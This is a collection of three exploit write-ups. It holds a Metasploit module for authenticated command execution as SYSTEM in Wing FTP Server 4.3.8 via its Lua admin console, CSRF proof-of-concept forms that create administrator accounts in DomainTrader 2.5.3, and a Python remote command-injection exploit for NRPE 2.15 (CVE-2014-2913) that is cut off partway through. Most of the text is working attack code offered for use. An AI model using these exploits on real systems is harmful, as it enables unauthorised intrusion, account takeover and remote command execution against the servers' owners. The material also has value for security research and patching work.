

Wing FTP Server Authenticated Command Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
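class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  # Module metadata.  Wing FTP Server exposes a Lua console
  # (/admin_lua_script.html) to authenticated administrators; every line of
  # the VBS command stager is wrapped in os.execute() and submitted to it, so
  # the commands run with the privileges of the Wing FTP service.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wing FTP Server Authenticated Command Execution',
      'Description'    => %q{
        This module exploits the embedded Lua interpreter in the admin web interface for
        versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
        an attacker can use os.execute() to execute arbitrary system commands on
        the target with SYSTEM privileges.
      },
      'Author'         =>
        [
          'Nicholas Nam <nick[at]executionflow.org>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'http://www.wftpserver.com' ]
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows VBS Stager', {} ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jun 19 2014',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(5466),
        OptString.new('USERNAME', [true, 'Admin username', '']),
        OptString.new('PASSWORD', [true, 'Admin password', ''])
      ], self.class
    )
    # Windows only (see 'Platform'): the stager flavour is fixed to VBS in
    # #exploit, so the user must not be able to pick another one.
    deregister_options('CMDSTAGER::FLAVOR')
  end

  # Fingerprint the admin login page.
  #
  # A check reports rather than aborts: an unreachable host yields
  # CheckCode::Unknown and a missing page CheckCode::Safe.  No version is
  # extracted from the page, so a positive result is only "Appears".
  def check
    res = send_request_cgi(
      'uri'    => '/admin_login.html',
      'method' => 'GET'
    )

    if res.nil?
      vprint_error("#{peer} - Admin login page was unreachable.")
      return Exploit::CheckCode::Unknown
    end

    unless res.code == 200
      vprint_error("#{peer} - Admin login page was not found.")
      return Exploit::CheckCode::Safe
    end

    # The page footer carries a copyright year range; match any range rather
    # than the literal "2003-2014" so builds with a later footer are not
    # silently reported Safe.
    title_ok  = res.body =~ /Wing FTP Server Administrator/
    footer_ok = res.body =~ /\d{4}-\d{4} <b>wftpserver\.com<\/b>/
    return Exploit::CheckCode::Appears if title_ok && footer_ok

    Exploit::CheckCode::Safe
  end

  # Log in as the configured administrator, then push the VBS stager through
  # the Lua console one line at a time (see #execute_command).
  def exploit
    @session_cookie = authenticate(datastore['USERNAME'], datastore['PASSWORD'])

    print_status("#{peer} - Sending payload")
    # Each stager line becomes one POST; ~1500 bytes per line is the length
    # the console has been observed to accept.
    execute_cmdstager(flavor: :vbs, linemax: 1500)
  end

  # Run one stager line through the admin Lua console.
  #
  # The command is embedded in a single-quoted Lua string literal, so a
  # backslash or apostrophe in it would otherwise be interpreted by Lua
  # (e.g. "%TEMP%\nfoo" turns into a newline) and corrupt the stager line.
  # Both are escaped so the exact bytes reach cmd.exe.
  def execute_command(cmd, _opts = {})
    command = "os.execute('cmd /c #{lua_escape(cmd)}')"

    res = send_request_cgi(
      'uri'       => '/admin_lua_script.html',
      'method'    => 'POST',
      'cookie'    => @session_cookie,
      'vars_post' => { 'command' => command }
    )

    # A missing response is tolerated on purpose — presumably because
    # os.execute() blocks until the spawned command exits, so the line that
    # launches the payload may not answer within the HTTP timeout.
    return if res.nil?

    fail_with(Failure::Unknown, "#{peer} - Something went wrong.") unless res.code == 200
  end

  # POST the admin credentials and return the session cookie as a
  # "UIDADMIN=<value>" Cookie header value.
  #
  # A successful login is recognised by the JavaScript redirect to main.html
  # that the server emits with a 200 status; any other 200 body (e.g. the
  # login form again) is treated as a failed login.  Aborts via fail_with on
  # an unreachable host, a failed login, or a login that set no UIDADMIN
  # cookie (without it every later console request would fail anyway).
  def authenticate(username, password)
    print_status("#{peer} - Authenticating")
    res = send_request_cgi(
      'uri'       => '/admin_loginok.html',
      'method'    => 'POST',
      'vars_post' => {
        'username'     => username,
        'password'     => password,
        'username_val' => username,
        'password_val' => password,
        'submit_btn'   => '+Login+'
      }
    )

    fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.") if res.nil?

    logged_in = res.code == 200 && res.body =~ /location='main.html\?lang=english';/
    fail_with(Failure::NoAccess, "#{peer} - Authentication failed") unless logged_in

    # Several cookies may be joined with ';' or ','; pull the UIDADMIN value
    # out directly rather than splitting on '=' (which would truncate a value
    # containing '=').
    uidadmin = res.get_cookies.to_s[/UIDADMIN=([^;,\s]+)/, 1]
    if uidadmin.nil? || uidadmin.empty?
      fail_with(Failure::NoAccess, "#{peer} - Login succeeded but no UIDADMIN cookie was set")
    end

    "UIDADMIN=#{uidadmin}"
  end

  # Escape +str+ for use inside a single-quoted Lua string literal: a
  # backslash and an apostrophe each get a backslash in front of them.
  def lua_escape(str)
    str.gsub(/['\\]/) { |c| "\\#{c}" }
  end
end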



DomainTrader Domain Parking / Auction Script 2.5.3 CSRF / XSS

# Exploit Title: DomainTrader Domain Parking and Auction Script Multiple 0day Vulnerabilities
# Google Dork: Find yourself xD
# Date: 26/8/2014
# Exploit Author: Haider Mahmood | @HaiderMQ
# Vendor Homepage: http://www.smartscriptsolutions.com/domain-trader/
# Version: Tested on Latest Version 2.5.3
 
Add new administrator (CSRF). The "addadminuser" action of admincp.php is reported to be accepted without any anti-CSRF token, so a DomainTrader administrator who is logged in and opens the page below gets an attacker-chosen administrator account created in their session:
 
 
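<!--
  CSRF proof of concept: create an administrator account.

  Notes on this PoC:
  * The form action must be an absolute URL. A bare "victim.com/admin/..."
    is a relative path and would be resolved against the page hosting the
    PoC, not the target, so it is written as http://victim.com/... here.
  * The server-side handler may look for the "submit" parameter, so it is
    kept as a hidden field. A control named "submit" shadows the form's
    submit() method in the DOM, so the form is submitted through
    HTMLFormElement.prototype.submit instead of forms[0].submit().
  * No external jQuery is needed; the script runs once the form exists.
  * Replace USERNAME / EMAIL_ADDRESS / DESIRED_PASSWORD before use.
-->
<form name="add_admin" id="add_admin" method="post" action="http://victim.com/admin/admincp.php">
  <input type="hidden" name="mode" value="addadminuser" />
  <input type="hidden" name="username" value="USERNAME" />
  <input type="hidden" name="email_address" value="EMAIL_ADDRESS" />
  <input type="hidden" name="password" value="DESIRED_PASSWORD" />
  <input type="hidden" name="submit" value="Add User" />
</form>
<script type="text/javascript">
  // Placed after the form so no load event is required.
  HTMLFormElement.prototype.submit.call(document.getElementById('add_admin'));
</script>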
 
 
Add new user (CSRF). The same pattern applies to the "addnewuser" action of admincp.php; the logged-in administrator's browser submits the form below:
 
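<!--
  CSRF proof of concept: create a regular user account.

  Notes on this PoC:
  * The form action must be an absolute URL (see the administrator PoC
    above); "victim.com/..." alone would be resolved relative to the
    attacker's page.
  * Only the parameters that are actually posted are needed, so every
    field is a hidden input. "country" takes one of the values from the
    application's own country list; the e-mail notification checkboxes
    were unchecked in the original form and are therefore not sent.
  * The "Submit" parameter is kept for the server-side handler; the form
    is submitted via HTMLFormElement.prototype.submit so a control named
    like the method cannot shadow it.
  * Replace the placeholder values before use.
-->
<form name="add_user" id="add_user" method="post" action="http://victim.com/admin/admincp.php">
  <input type="hidden" name="mode" value="addnewuser">
  <input type="hidden" name="user_name" value="USERNAME_VALUE">
  <input type="hidden" name="newpassword" value="DESIRED_PASSWORD">
  <input type="hidden" name="cnewpassword" value="DESIRED_PASSWORD">
  <input type="hidden" name="first_name" value="FIRSTNAME">
  <input type="hidden" name="last_name" value="LASTNAME">
  <input type="hidden" name="email_address" value="DESIRED_VALUE">
  <input type="hidden" name="telephone" value="010101010">
  <input type="hidden" name="street_address" value="BLA_BLA_BLA">
  <input type="hidden" name="city" value="BLA_BLA_BLA">
  <input type="hidden" name="county" value="BLA_BLA_BLA">
  <input type="hidden" name="postcode" value="BLA_BLA_BLA">
  <input type="hidden" name="country" value="UNITED STATES">
  <input type="hidden" name="Submit" value="Submit">
</form>
<script type="text/javascript">
  // Placed after the form so no load event is required.
  HTMLFormElement.prototype.submit.call(document.getElementById('add_user'));
</script>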
 
 
XSS:
 
The fields of the Add New Administrator form are stored without sanitisation and rendered back without output encoding, giving a persistent (stored) XSS in the admin interface. Because the same action is also vulnerable to CSRF (above), a script payload can be planted in one of these fields, e.g. the username, without direct access to an administrator account.



NRPE 2.15 Remote Command Execution

#!/usr/bin/python
#
#
# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability
#
# Discovered by  : Dawid Golunski
#                  dawid (at) legalhackers (dot) com
#                  legalhackers.com
#
# Exploit Author : Claudio Viviani
#                  http://www.homelab.it
#
#                  info@homelab.it
#                  homelabit@protonmail.ch
#
#                  https://www.facebook.com/homelabit
#                  https://twitter.com/homelabit
#                  https://plus.google.com/+HomelabIt1/
#                  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#
#
#
# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org>
#                                       http://www.abcompcons.com/files/nrpe_client.py
#
# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)
#
# [root@localhost ~]# pip-python install pyOpenSSL
#
# NRPE <= 2.15 Remote Command Execution Vulnerability
# (only exploitable when the NRPE daemon is configured to accept command
#  arguments from clients, i.e. dont_blame_nrpe=1 in nrpe.cfg)
# Release date: 17.04.2014
# Discovered by: Dawid Golunski
# Severity: High
# CVE-2014-2913
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913
# http://www.exploit-db.com/exploits/32925/
# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)
#
# Tested on CentOS 5.x, CentOS 6.x, BackBox 3.x, Kali Linux 1.0.6 with Python 2.x
#
# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE
#
 
import OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/
import optparse
import os
import signal
import socket
import struct
import sys
import time
 
banner = """
 
$$\   $$\ $$$$$$$\  $$$$$$$\  $$$$$$$$\        $$$$$$\        $$\  $$$$$$$\\
$$$\  $$ |$$  __$$\ $$  __$$\ $$  _____|      $$  __$$\     $$$$ | $$  ____|
$$$$\ $$ |$$ |  $$ |$$ |  $$ |$$ |            \__/  $$ |    \_$$ | $$ |
$$ $$\$$ |$$$$$$$  |$$$$$$$  |$$$$$\           $$$$$$  |      $$ | $$$$$$$\\
$$ \$$$$ |$$  __$$< $$  ____/ $$  __|         $$  ____/       $$ | \_____$$\\
$$ |\$$$ |$$ |  $$ |$$ |      $$ |            $$ |            $$ | $$\   $$ |
$$ | \$$ |$$ |  $$ |$$ |      $$$$$$$$\       $$$$$$$$\ $$\ $$$$$$\\$$$$$$  |
\__|  \__|\__|  \__|\__|      \________|      \________|\__|\______|\______/
 
 
 
                  $$$$$$$\   $$$$$$\  $$$$$$$$\\
                  $$  __$$\ $$  __$$\ $$  _____|
                  $$ |  $$ |$$ /  \__|$$ |
                  $$$$$$$  |$$ |      $$$$$\\
                  $$  __$$< $$ |      $$  __|
                  $$ |  $$ |$$ |  $$\ $$ |
                  $$ |  $$ |\$$$$$$  |$$$$$$$$\\
                  \__|  \__| \______/ \________|
                                                   NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n
 
 
                =============================================
                - Release date: 17.04.2014
                - Discovered by: Dawid Golunski
                - Severity: High
                - CVE: 2014-2913
                =============================================
 
                                Written by:
 
                              Claudio Viviani
 
                           http://www.homelab.it
 
                              info@homelab.it
                           homelabit@protonmail.ch
 
                      https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
"""
# Plugin list for Brute force mode
# Names of common Nagios plugin commands. In brute-force mode (-b) the
# __main__ block sends each one as the NRPE command name and keeps the first
# that the daemon does not answer with "not defined". Also printed by --list.
PluginList = ['check_all',
             'check_apt',
             'check_bdii',
             'check_bonding',
             'check_breeze',
             'check_by_ssh',
             'check_check-updates',
             'check_check_sip',
             'check_cluster',
             'check_dhcp',
             'check_dig',
             'check_disk',
             'check_disk_smb',
             'check_dns',
             'check_dpm-disk',
             'check_dpm-head',
             'check_dummy',
             'check_file_age',
             'check_flexlm',
             'check_fping',
             'check_game',
             'check_hpjd',
             'check_http',
             'check_icmp',
             'check_ide_smart',
             'check_ifoperstatus',
             'check_ifstatus',
             'check_ircd',
             'check_lcgdm',
             'check_lcgdm-common',
             'check_ldap',
             'check_lfc',
             'check_linux_raid',
             'check_load',
             'check_log',
             'check_mailq',
             'check_mrtg',
             'check_mrtgtraf',
             'check_mysql',
             'check_nagios',
             'check_nrpe',
             'check_nt',
             'check_ntp',
             'check_nwstat',
             'check_openmanage',
             'check_oracle',
             'check_overcr',
             'check_perl',
             'check_pgsql',
             'check_ping',
             'check_procs',
             'check_radius',
             'check_real',
             'check_rhev',
             'check_rpc',
             'check_sensors',
             'check_smtp',
             'check_snmp',
             'check_ssh',
             'check_swap',
             'check_tcp',
             'check_time',
             'check_ups',
             'check_users',
             'check_wave']
 
 
 
# nrpe 2.15 skip chars "|`&><'\"\\[]{};" and "$()" but not "\x0a"(new line)
# Detection note: a bare newline byte inside the argument part of an NRPE
# query is not something a legitimate check_nrpe client produces, so it is a
# usable alerting signature on the wire (and in any argument logging the
# daemon does).
evilchar = "\x0a"
 
# Values of the packet_type header field (see DataPacket): a client sends a
# query and expects a response back (checked in NrpeClient.run_query).
QUERY_PACKET    = 1
RESPONSE_PACKET = 2
 
# Value of the packet_version header field; the only version this client accepts.
NRPE_PACKET_VERSION_2 = 2
 
# max amount of data we'll send in one query/response
# The data buffer is NUL-padded to exactly this size by DataPacket.__str__.
MAX_PACKETBUFFER_LENGTH = 1024
 
 
#def debug(sMessage):
#    """Send a string to STDERR"""
#    if DEBUG:
#        sys.stderr.write("%s\n" % sMessage)
 
class DataPacket:
    """A Python implementation of the C struct, packet.

    Mirrors the NRPE v2 wire packet: a fixed header (packet version, packet
    type, CRC32, result code) followed by the data buffer. __str__ serialises
    it in network byte order, extract() parses a received buffer back into
    the attributes, and calculate_crc32() fills in the checksum field.
    Python 2 code: strings are byte strings throughout.
    """
    def __init__(self, packet_version, packet_type):
        # Header fields; the width comments are those of the C struct.
        self.nPacketVersion = packet_version # int16
        self.nPacketType = packet_type # int16
        self.nCRC32 = 0 # u_int32
        self.nResultCode = 2324 # int16
        # Data buffer; padded out to MAX_PACKETBUFFER_LENGTH when serialised.
        self.sData = ''
        # Standard reflected CRC-32 lookup table (polynomial 0xEDB88320, the
        # same table zlib uses); indexed by one byte in calculate_crc32().
        self.tCRC32 = (
             0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
             0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
             0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
             0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
             0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
             0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
             0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
             0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
             0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
             0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
             0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
             0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
             0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
             0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
             0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
             0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
             0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
             0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
             0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
             0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
             0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
             0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
             0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
             0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
             0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
             0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
             0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
             0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
             0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
             0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
             0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
             0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
             0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
             0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c,
             0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef,
             0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
             0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe,
             0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31,
             0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c,
             0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
             0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b,
             0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242,
             0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1,
             0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
             0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278,
             0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7,
             0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66,
             0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
             0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605,
             0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8,
             0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b,
             0x2d02ef8d)
 
    def __str__(self):
        """Serialise self as the raw packet bytes (network byte order).

        The data buffer is NUL-padded to MAX_PACKETBUFFER_LENGTH plus two
        trailing bytes; a buffer that is already exactly that size is used
        as-is (the shape extract() produces). Raises ValueError for any other
        length, so sData longer than the buffer is rejected rather than
        truncated.
        """
        # Turn whatever string data we have into a null terminated string
        if len(self.sData) < MAX_PACKETBUFFER_LENGTH:
            sData = self.sData + "\0" * (MAX_PACKETBUFFER_LENGTH - len(self.sData))
            # presumably fills the two alignment bytes that follow the C
            # struct's buffer[] — the original author was unsure; confirm.
            sData += "SR" # not sure about this, from perl
        elif len(self.sData) == MAX_PACKETBUFFER_LENGTH + 2:
            sData = self.sData
        else:
            raise ValueError("CHECK_NRPE: invalid input")
        # Return a string that equals the C struct, not something printable
        # "!" = big-endian; fields are int16, int16, uint32, int16, then the buffer.
        return struct.pack("!hhLh" + str(len(sData)) + "s", self.nPacketVersion,
            self.nPacketType, self.nCRC32, self.nResultCode, sData)
 
    def __len__(self):
        """Size of the serialised packet (10 header bytes + the padded buffer)."""
        return len(self.__str__())
 
    def dumpself(self):
        """Debugging output for self as C structure.

        Not normally used.

        Prints a run-length style listing of the serialised bytes: runs of
        identical bytes are collapsed to "<offset>\\t<count> *", single bytes
        to "<offset>\\t", each followed by the character and its ordinal.
        Python 2 print statements."""
        sElf = self.__str__()
        sPrev = sElf[0:1]
        nCount = 0
        ii = -1
        for sChar in sElf[1:]:
            ii += 1
            if sChar == sPrev:
                nCount += 1
                continue
            if nCount:
                print "%d\t%d *" % (ii - nCount, nCount + 1),
                nCount = 0
            else:
                print "%d\t" % ii,
            print "\t'%s' (%d)" % (sPrev, ord(sPrev))
            sPrev = sChar
        # flush the final run
        print "%d\t\t'%s' (%d)" % (ii + 1, sPrev, ord(sPrev))
 
    def calculate_crc32(self):
        """Calculate the CRC32 value for the string version of self.

        Table-driven CRC-32 (initial value 0xFFFFFFFF, final XOR) over the
        full serialised packet, stored into self.nCRC32. Because the checksum
        covers the nCRC32 field itself, callers set nCRC32 to 0 before
        calling (see NrpeClient.run_query).
        """
        nCRC = 0xFFFFFFFF
        for ii in self.__str__():
            nIndex = (nCRC ^ ord(ii)) & 0xFF
            nCRC = ((nCRC >> 8) & 0x00FFFFFF) ^ self.tCRC32[nIndex]
        self.nCRC32 = nCRC ^ 0xFFFFFFFF
        #debug("DataPacket.calculate_crc32 = %d" % self.nCRC32)
 
    def extract(self, sQuery):
        """Turn a string into the DataPacket attributes.

        Inverse of __str__: the first 10 bytes are the header (2+2+4+2), the
        remainder becomes sData unchanged (still NUL-padded). struct.unpack
        raises struct.error if sQuery is shorter than 10 bytes.
        """
        #debug("DataPacket.extract(%d)" % len(sQuery))
        tVals = struct.unpack("!hhLh" + str(len(sQuery) - 10) + "s", sQuery)
        self.nPacketVersion = tVals[0]
        self.nPacketType = tVals[1]
        self.nCRC32 = tVals[2]
        self.nResultCode = tVals[3]
        self.sData = tVals[4]
 
# Seconds reported in the timeout message; the __main__ block overwrites it
# from the --timeout option before any query is sent.
m_nTimeout = 0
def alarm_handler(nSignum, oFrame):
    """Timeout catcher: SIGALRM handler installed by NrpeClient.run_query.

    Always raises KeyboardInterrupt (which the custom-command path in
    __main__ catches) carrying the module-level m_nTimeout. The signal
    number and frame are accepted but unused.
    """
    message = "CHECK_NRPE: Socket timeout after %d seconds." % m_nTimeout
    raise KeyboardInterrupt(message)
 
 
class NrpeClient(DataPacket):
    """Everything needed to send a message to an NRPE server and get data back.

    The instance doubles as the packet: run_query() fills in sData/nCRC32,
    serialises itself, and after the round trip overwrites its own header
    fields and sData with the server's response via extract().
    """
    def __init__(self, server_name, server_port=5666, use_ssl=True, timeout=10,
                 packet_version=NRPE_PACKET_VERSION_2):
        # Starts life as a QUERY packet; extract() later turns it into the response.
        DataPacket.__init__(self, packet_version, QUERY_PACKET)
        self.sServer = server_name
        self.nPort = server_port
        self.bUseSSL = use_ssl
        self.nTimeout = timeout  # seconds; enforced with SIGALRM in run_query
 
    def run_query(self, sQuery):
        """Connect to the NRPE server, send the query and get back data.

        On return self.sData holds the server's reply text, cut at the first
        NUL. Raises IOError on an empty or short reply and ValueError when the
        reply's CRC32, packet version or packet type is wrong; a timeout
        surfaces as the KeyboardInterrupt raised by alarm_handler, and
        connection problems as socket / OpenSSL.SSL errors from the calls below.
        """
        # initialize alarm signal handling and set timeout
        # SIGALRM fires after nTimeout seconds and alarm_handler raises out
        # of whatever blocking call is in progress.
        signal.signal(signal.SIGALRM, alarm_handler)
        signal.alarm(self.nTimeout)
 
        # try to connect to the host at the given port number
        oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # do SSL handshake
        # TLSv1 with the anonymous-DH cipher class: the channel is encrypted
        # but the server presents no certificate, so its identity is not
        # verified. This matches what stock NRPE 2.x offers — confirm for the
        # build in use.
        if self.bUseSSL:
            oContext = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
            oContext.set_cipher_list('ADH')
            oConnection = OpenSSL.SSL.Connection(oContext, oSocket)
        else:
            oConnection = oSocket
 
        oConnection.connect((self.sServer, self.nPort))
 
        # we're connected and ready to go
        # nCRC32 must be 0 while the checksum is computed: the CRC covers the
        # whole serialised packet, this field included.
        self.sData = sQuery
        self.nCRC32 = 0
        self.calculate_crc32()
 
        # send the packet
        oConnection.send(str(self))  # str(self) is the serialised struct (DataPacket.__str__)
 
        # wait for the response packet
        # one packet's worth: len(self) is the serialised size of this packet
        sRval = oConnection.recv(len(self))
 
        # close the connection
        # NOTE(review): pyOpenSSL's shutdown() returns False while the
        # bidirectional TLS shutdown is still pending; the extra recv looks
        # intended to drain what the server sent before close_notify — confirm.
        if self.bUseSSL and not oConnection.shutdown():
            try:
                sRval += oConnection.recv(len(self))
            except OpenSSL.SSL.ZeroReturnError:
                pass
        oSocket.close()
        del oSocket, oConnection
        if self.bUseSSL:
            del oContext
 
        # reset timeout
        signal.alarm(0)  # disarm; the handler itself stays installed
 
        if len(sRval) == 0:
            raise IOError("CHECK_NRPE: Received 0 bytes from daemon." +
                "Check the remote server logs for error messages.")
        elif len(sRval) < len(self):
            raise IOError("CHECK_NRPE: Receive underflow - only " +
                "%d bytes received (%d expected)." % (len(sRval), len(self)))
 
        # Become the received data
        self.extract(sRval)  # from here on self's fields describe the response
 
        # check the crc 32 value
        # Recompute over the reply with its CRC field zeroed, the way the
        # sender computed it, and compare with the value that was received.
        nRvalCRC = self.nCRC32
        self.nCRC32 = 0
        self.calculate_crc32()
        if nRvalCRC != self.nCRC32:
            raise ValueError("CHECK_NRPE: Response packet had invalid CRC32.")
 
        # check packet version
        if self.nPacketVersion != NRPE_PACKET_VERSION_2:
            raise ValueError("CHECK_NRPE: Invalid packet version received from server.")
 
        # check packet type
        if self.nPacketType != RESPONSE_PACKET:
            raise ValueError("CHECK_NRPE: Invalid packet type received from server.")
 
        # Turn the input data into a proper python string (chop at first NULL)
        # NOTE(review): if sData contains no NUL the last byte is dropped, and
        # an empty sData leaves `ii` unbound (NameError on the slice below).
        for ii in range(len(self.sData)):
            if self.sData[ii] == "\0":
                break
        self.sData = self.sData[0:ii]
 
 
if __name__ == '__main__':
    # Command-line front end (Python 2: note the print statements below).
    m_oOpts = optparse.OptionParser("%prog -H Host_or_IP -c nrpe_command --cmd=\"command to execute\" [-b, --brute] [-n] [-p PORT] [--timeout sec] [--list]")
    m_oOpts.add_option('--host', '-H', action='store', type='string',
        help='The address of the host running the NRPE daemon (required)')
    # store_false: giving -n/--ssl *disables* SSL (the option name reads backwards).
    m_oOpts.add_option('--ssl', '-n', action='store_false', default=True,
        help='Do no use SSL')
    m_oOpts.add_option('--port', '-p', action='store', type='int', default=5666,
        help='The port on which the daemon is running (default=5666)')
    m_oOpts.add_option('--timeout', '-t', action='store', type='int',
        default=10,
        help='Number of seconds before connection times out (default=10)')
    m_oOpts.add_option('--command', '-c', action='store', type='string',
        #default='get_data',
        help='The name of nrpe command')
    m_oOpts.add_option('--brute', '-b', action='store_true', default=False,
        help='Find existing nrpe command from list [ -list ]')
    m_oOpts.add_option('--list', action='store_true',  default=False,
        help='Show NRPE Command list')
    m_oOpts.add_option('--cmd', action='store', type='string',
        help='Command to execute on the remote server')
 
    # m_lArgs: leftover positional arguments, appended to --cmd below.
    m_oOptions, m_lArgs = m_oOpts.parse_args()
    m_nTimeout = m_oOptions.timeout  # read by alarm_handler for its message
    m_sQuery = m_oOptions.command
    m_gList = m_oOptions.list
    m_sBrute = m_oOptions.brute
 
    print (banner)
 
    # Mode selection: --list only prints the plugin table; -c and -b are
    # mutually exclusive; --host and --cmd are required for either mode.
    # Every early exit here uses status 0, including the error cases.
    if m_gList:
        print('[+] NRPE Command list\n')
        for LinesPluginList in PluginList:
            print(LinesPluginList)
        sys.exit(0)
    elif m_sQuery and m_sBrute:
        print m_oOpts.format_help()
        print('[!]')
        print('[!] ERROR: Select only -c OR -b option\n')
        sys.exit(0)
    elif not m_oOptions.host or not m_oOptions.cmd:
        print m_oOpts.format_help()
        sys.exit(0)
 
    print('[+] Target: '+m_oOptions.host)
    print('[+] Command: '+m_oOptions.cmd+' \n')
 
    if m_sBrute:
        # Brute-force mode: try every name in PluginList as the NRPE command.
        # A reply ending in "not defined" means the daemon has no such
        # command; the first other reply is printed and the script exits.
        # NOTE(review): unlike custom mode below, KeyboardInterrupt (the
        # alarm_handler timeout) is not caught here, so a timeout ends the
        # run with a traceback.
        print('[+] Brute force Mode....')
        print('[+]')
        for LinesPluginList in PluginList:
 
                # argument string = --cmd plus any positional leftovers
                m_CommandQuery = ""
                m_CommandQuery += ' ' + m_oOptions.cmd
                if m_lArgs:
                        m_CommandQuery += ' ' + ' '.join(m_lArgs)
 
                # query = <plugin name>!<evilchar><argument string> #  (evilchar: see top of file)
                m_sQuery = LinesPluginList+'!'+str(evilchar)+str(m_CommandQuery)+' #'
 
 
                # a fresh client per attempt; run_query leaves the reply in sData
                m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
                        m_oOptions.timeout)
                try:
